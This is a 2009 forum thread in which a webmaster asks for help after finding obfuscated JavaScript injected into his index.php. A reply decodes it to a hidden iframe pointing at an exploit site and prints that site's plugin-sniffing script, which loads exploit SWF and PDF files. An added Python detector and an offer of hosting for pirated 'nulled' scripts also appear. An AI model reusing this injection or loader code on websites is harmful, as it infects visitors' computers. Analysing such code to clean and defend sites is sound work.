GSM-Forum  
Post #1, 05-06-2009 20:00
Someone hacked my website- Anyone can help me?


I run a forum (Non GSM related), and the forum is stored in a /forum/ directory.

In the root of my domain, I only have the index.php file which is like a disclaimer, within only basic HTML.

Problem is, these past few days members started reporting that their anti-virus etc. was saying my website is a malicious site, and warning of a virus.

I use Nod32 and Avast on my PCs, and I was not getting any warning message, but when I visited the root of my domain (index.php), it would auto start ACROBATREADER.EXE

It would start using VERY HIGH memory resources, but seem to do nothing else.

After I looked into things closely, I examined the index.php file and found the following code has somehow been added to the file:

PHP Code:
<?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo '<script type="text/javascript">var jfbqwCRgMagVAISgjojw = "uxN60uxN105uxN102uxN114uxN97uxN109uxN101uxN32uxN119uxN105uxN100uxN116uxN104uxN61uxN34uxN52uxN56uxN48uxN34uxN32uxN104uxN101uxN105uxN103uxN104uxN116uxN61uxN34uxN54uxN48uxN34uxN32uxN115uxN114uxN99uxN61uxN34uxN104uxN116uxN116uxN112uxN58uxN47uxN47uxN112uxN114uxN111uxN102uxN105uxN45uxN116uxN111uxN111uxN108uxN116uxN105uxN112uxN46uxN98uxN105uxN122uxN47uxN98uxN108uxN111uxN103uxN47uxN102uxN101uxN101uxN100uxN46uxN104uxN116uxN109uxN108uxN34uxN32uxN115uxN116uxN121uxN108uxN101uxN61uxN34uxN98uxN111uxN114uxN100uxN101uxN114uxN58uxN48uxN112uxN120uxN59uxN32uxN112uxN111uxN115uxN105uxN116uxN105uxN111uxN110uxN58uxN114uxN101uxN108uxN97uxN116uxN105uxN118uxN101uxN59uxN32uxN116uxN111uxN112uxN58uxN48uxN112uxN120uxN59uxN32uxN108uxN101uxN102uxN116uxN58uxN45uxN53uxN48uxN48uxN112uxN120uxN59uxN32uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN59uxN32uxN102uxN105uxN108uxN116uxN101uxN114uxN58uxN112uxN114uxN111uxN103uxN105uxN100uxN58uxN68uxN88uxN73uxN109uxN97uxN103uxN101uxN84uxN114uxN97uxN110uxN115uxN102uxN111uxN114uxN109uxN46uxN77uxN105uxN99uxN114uxN111uxN115uxN111uxN102uxN116uxN46uxN65uxN108uxN112uxN104uxN97uxN40uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN61uxN48uxN41uxN59uxN32uxN45uxN109uxN111uxN122uxN45uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN34uxN62uxN60uxN47uxN105uxN102uxN114uxN97uxN109uxN101uxN62";var pCtNiMOUYGQHlsyivQPI = jfbqwCRgMagVAISgjojw.split("uxN");var qwdrEwYolHlaKeosrDNQ = "";for (var JdXvWWeRmuZdqDUuzsjk=1; JdXvWWeRmuZdqDUuzsjk<pCtNiMOUYGQHlsyivQPI.length; JdXvWWeRmuZdqDUuzsjk++){qwdrEwYolHlaKeosrDNQ+=String.fromCharCode(pCtNiMOUYGQHlsyivQPI[JdXvWWeRmuZdqDUuzsjk]);}document.write(qwdrEwYolHlaKeosrDNQ)</script>'?>
Can anyone tell me how someone's done this as I am the only person with FTP access to my website, other than my host.

I've removed this code from the index.php file now and it seems to be fine.. But I want to make sure this cannot happen again.

I'm also worried that they have uploaded something else on my server too, and not just added this coding.

Can anyone give me any help with this?

Thanks
Post #2, 05-06-2009 21:03
maybe you are running an infected vb
Post #3, 05-06-2009 21:43
if you need a good host ( offshore and you can run nulled script and 100% safe ) contact me
Post #4, 05-06-2009 23:34
I've been running this VB for about 8 months with no problem.

Thousands of people are using the release I'm using with no issue, so it can't be the problem.

Problem is someone has managed to add this script to my index.php file (Not the VB index.php file).
Post #5, 05-07-2009 01:35, maxmix
I have the same also at www.hhd.co.uk and my IP will not even help me fix my page....

Any ideas ? Can you virus scan and repair a web page as you would your PC ?

maxmix
Post #6, 05-07-2009 04:36
Quote: Originally Posted by maxmix
I have the same also at www.hhd.co.uk and my IP will not even help me fix my page....

Any ideas ? Can you virus scan and repair a web page as you would your PC ?

maxmix
Check your index.html or index.php file

See if any code has been added to it that shouldn't be there.
Post #7, 05-07-2009 05:34, papsnew
@mobileman
According to your Avatar (location) you seem to be in bed with someone's wife. Could it be the reason you are having these problems?
Post #8, 05-07-2009 07:51, maxmix
Quote: Originally Posted by =MobileMan=
Check your index.html or index.php file

See if any code has been added to it that shouldn't be there.
Hi M8

Thanks for the advice, I have seen this file, deleted it and uploaded my original.... After a few days my site becomes infected again....

It's happened about 6 times now every time I fix it... Can you help...

How can they keep altering my index file? Has my FTP password been compromised? This is the only thing I have never changed...

I gave up on it lol

maxmix
Post #9, 05-07-2009 15:04
Quote: Originally Posted by maxmix
Hi M8

Thanks for the advice, I have seen this file, deleted it and uploaded my original.... After a few days my site becomes infected again....

It's happened about 6 times now every time I fix it... Can you help...

How can they keep altering my index file? Has my FTP password been compromised? This is the only thing I have never changed...

I gave up on it lol

maxmix
No idea mate this is what I'm trying to find out.

Can anyone tell me how this code has been injected to my index.php file?

Or explain to me in simple terms how this script works?

Thanks
Post #10, 05-07-2009 15:32
Change your Passwords

Most probably all your FTP user info was hijacked by an FTP Trojan.

1. Scan your PC
2. Change FTP password
3. Remove all bad code manually
4. Report to your hosting Provider

If you have problem with removing this code, contact me I may be able to help you. Use my website contact form.
www.digidestination.com
Post #11, 05-07-2009 16:46
That javascript blabla comes out to:

Code:
<iframe width="480" height="60" src="http://profi-tooltip.biz/blog/feed.html" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>
It opens an iframe to that dodgy site, which then runs the script that contains 2 infected exploits, one being a .swf file and one being a .pdf

Code:
<script>
function mjnhyua() { return 'ra'+'m'; }
for(i=0;navigator.plugins[i];i++){
		regexp=new RegExp('.ho.+?wave.+?([0-9]+).+?([0-9]+).+?([0-9]+)');
var ertdfg = "dfgdfgdfgdf43565gkui";
		result=regexp.exec(navigator.plugins[i]['description']);
ertdfg = "dfgdfgdfgdf43565gkui";
		if(result!=null && result[1]==9 && result[2]==0 && result[3]<124) {
ertdfg = "dfgdfgdfgdf43565gkui";
			document.write('<if'+mjnhyua()+'e src="fmocs.swf"></if'+mjnhyua()+'e>');
ertdfg = "dfgdfgdfgdf43565gkui";
			break;
		}
}
for(i=0;navigator.plugins[i];i++){
		name=navigator.plugins[i].name;
		if(name.indexOf('Adobe Acrobat')!=-1){
			document.write('<if'+mjnhyua()+'e src="fnocs.pdf"></if'+mjnhyua()+'e>');
			break;
		}
}
</script>
File: fmocs.swf Status: INFECTED/MALWARE MD5: 04edba09fc62d7f8ed56a346491a3125
Specifically crafted SWF (Flash) files allow remote file execution when the client has a vulnerable FlashPlayer. A malformed SWF record's value triggers a buffer overflow. The size of the SWF files varies. Usually it's a download-and-execute shellcode used to download and run a PasswordStealer trojan. It seems that all versions of FlashPlayer up to 9.0.124.0 are vulnerable (though we saw malicious pages trying to exploit only versions 115 and 47).

The other file, the PDF, is: This is a generic detection for specially crafted PDF files which exploit different vulnerabilities found in Adobe PDF Reader's Javascript engine in order to execute malicious code on the user's computer. The exploitation mainly involves the following two functions:

util.printf() - if an attacker sends a string long enough to generate a stack-based buffer overflow he will then be able to execute arbitrary code on the user's computer with the same level privileges as the user who opened the PDF file

Collab.collectEmailInfo() - a stack-based buffer overflow can be caused by passing a string long enough (at least 44952 characters) as a parameter in the msg field of this function.

The Javascript function containing the actual exploit is specified in the OpenAction tag of the PDF file. Usually this function is encoded using zlib. After decompression sometimes the script is still obscured through one or more layers of encoding in order to avoid detection and make analysis more difficult.
The javascript code inside the PDF file is used to download and execute other malware on user's computer.


I can conclude that the following people are vulnerable to this exploit:
people using FlashPlayer 9.0.124.0 and below, or adobe acrobat reader before 8.1.2
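A Python triage script for the decoding described in this post, added here as an example (it is not code from the thread): decode_uxn reproduces the split/fromCharCode loop, and find_hidden_iframes scans page source for that decoder pattern and flags decoded iframes whose inline style hides them; the fixture is constructed, with attacker.invalid standing in for the real host.

```python
import re

# Matches the decoder shape used by the injected script: a quoted string of
# delimiter-separated char codes, later .split("<delim>") and fed to fromCharCode.
PAYLOAD_RE = re.compile(r'var\s+\w+\s*=\s*"([^"]*)"\s*;.*?\.split\("([^"]+)"\)', re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# Inline-style fragments (spaces stripped) that keep a frame out of the user's sight.
HIDING_HINTS = ("opacity:0", "left:-", "top:-", "visibility:hidden", "display:none")


def decode_uxn(encoded, delim):
    """Reproduce the script's loop: split on the delimiter, skip the empty
    piece before the first code (the original loop starts at index 1) and
    turn each decimal code into a character."""
    return "".join(chr(int(p)) for p in encoded.split(delim)[1:] if p.isdigit())


def encode_uxn(text, delim="uxN"):
    """Inverse of decode_uxn; used here only to build the constructed fixture."""
    return "".join(delim + str(ord(c)) for c in text)


def find_hidden_iframes(page):
    """Decode every matching payload in a page and return the opening tags of
    iframes whose style hides them (transparent or positioned off-screen)."""
    hits = []
    for m in PAYLOAD_RE.finditer(page):
        decoded = decode_uxn(m.group(1), m.group(2))
        for tag in IFRAME_RE.findall(decoded):
            style = tag.lower().replace(" ", "")
            if any(h in style for h in HIDING_HINTS):
                hits.append(tag)
    return hits


# Constructed fixture (not the thread's real payload): the decoded iframe from
# the thread with its host replaced by a placeholder, re-encoded the same way.
HIDDEN_IFRAME = ('<iframe width="480" height="60" src="http://attacker.invalid/feed.html" '
                 'style="border:0px; position:relative; left:-500px; opacity:0"></iframe>')
SAMPLE_PAGE = (
    "<?php echo '<script type=\"text/javascript\">var a = \"" + encode_uxn(HIDDEN_IFRAME)
    + "\";var b = a.split(\"uxN\");var c = \"\";"
    "for (var i=1; i<b.length; i++){c+=String.fromCharCode(b[i]);}"
    "document.write(c)</script>'?>"
)

if __name__ == "__main__":
    for tag in find_hidden_iframes(SAMPLE_PAGE):
        print("hidden iframe found:", tag)
```

Run it over each index.php or index.html you restore; a clean file yields no output.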
Post #12, 05-08-2009 01:55
Thanks very much to both of you.

You're right, my PC was infected (Nod32 never found anything), but I uninstalled it, then installed Avast, did a boot scan and it found and deleted loads.

Site seems fine now, and I've changed my FTP passwords just in case.

Cheers very much for the help, and info on what the script was actually doing.
Post #13, 05-09-2009 03:35
OK Update-

Today I've found out that ALL of my sites have been injected with this malicious code.

Sites are stored on 2 different servers.

One of the things Avast said it found on my PC and removed was a rootkit.

I'm guessing it's not removed it completely, and whatever's on my PC is actually injecting the code into all my websites' index.php or index.html pages by accessing my FTP accounts.

Does anyone have any idea how to remove this from my PC fully?

I've tried Avast, and also Superantispyware.

Thanks